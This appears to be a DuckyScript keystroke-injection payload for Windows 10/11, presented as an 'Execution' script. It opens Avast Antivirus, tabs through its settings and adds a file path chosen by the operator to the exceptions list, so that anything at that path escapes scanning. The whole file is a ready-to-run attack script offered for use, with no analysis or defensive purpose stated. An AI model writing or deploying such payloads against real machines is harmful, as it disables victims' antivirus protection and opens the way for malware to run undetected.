REM ########################################################
REM #                                                      |
REM # Title        : Add An Exception To Avast Antivirus   |
REM # Author       : Aleff                                 |
REM # Version      : 1.0                                   |
REM # Category     : Execution                             |
REM # Target       : Windows 10/11                         |
REM #                                                      |
REM ########################################################


REM Requirements:
REM     - Avast installed and configured


REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path


REM Open Avast application
DELAY 2000
GUI
DELAY 1000
STRING avast
DELAY 1000
ENTER

REM Go to Avast menu
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER

REM Go to Avast settings
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER

REM Go to Exceptions menu
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER

REM Add Exception button
DELAY 500
TAB
DELAY 500
ENTER

REM Write the full-path and then close the Avast app
DELAY 1000
TAB
DELAY 500
STRING FULL-PATH
DELAY 500
TAB
DELAY 500
ENTER
DELAY 1000
ALT F4
